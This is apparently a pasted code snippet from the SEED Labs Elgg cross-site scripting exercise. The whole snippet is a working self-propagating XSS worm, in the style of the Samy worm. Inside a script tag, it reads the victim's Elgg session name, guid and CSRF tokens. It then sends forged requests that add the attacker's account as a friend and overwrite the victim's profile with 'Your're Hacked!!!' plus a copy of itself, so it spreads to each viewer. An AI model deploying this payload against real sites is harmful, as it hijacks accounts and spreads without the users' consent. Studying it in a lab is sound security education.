Untitled
unknown
javascript
a year ago
1.8 kB
2
Indexable
Never
<script id=worm> window.onload = function(){ var headerTag = "<script id=\"worm\" type=\"text/javascript\">"; var jsCode = document.getElementById("worm").innerHTML; var tailTag = "</" + "script>"; var descriptionContent = "Your're Hacked!!!" + encodeURIComponent(headerTag + jsCode + tailTag); //JavaScript code to access user name, user guid, Time Stamp __elgg_ts //and Security Token __elgg_token var userName="&name="+elgg.session.user.name; var guid="&guid="+elgg.session.user.guid; var ts="&__elgg_ts="+elgg.security.token.__elgg_ts; var token="&__elgg_token="+elgg.security.token.__elgg_token; //Construct the HTTP request to add Samy as a friend. var addFriendURL="http://www.xsslabelgg.com/action/friends/add?friend=47" + ts + token; var description="&description=" + descriptionContent; //Construct the content of your url. var content=token + ts + userName + description + guid; var samyGuid=47; var editProfileURL = "http://www.xsslabelgg.com/action/profile/edit"; if(elgg.session.user.guid!=samyGuid) { var Ajax=null; //Create and send Ajax request to add friend Ajax=new XMLHttpRequest(); Ajax.open("GET",addFriendURL,true); Ajax.setRequestHeader("Host","www.xsslabelgg.com"); Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); Ajax.send(); //Create and send Ajax request to modify profile Ajax=new XMLHttpRequest(); Ajax.open("POST",editProfileURL,true); Ajax.setRequestHeader("Host","www.xsslabelgg.com"); Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); Ajax.send(content); } } </script>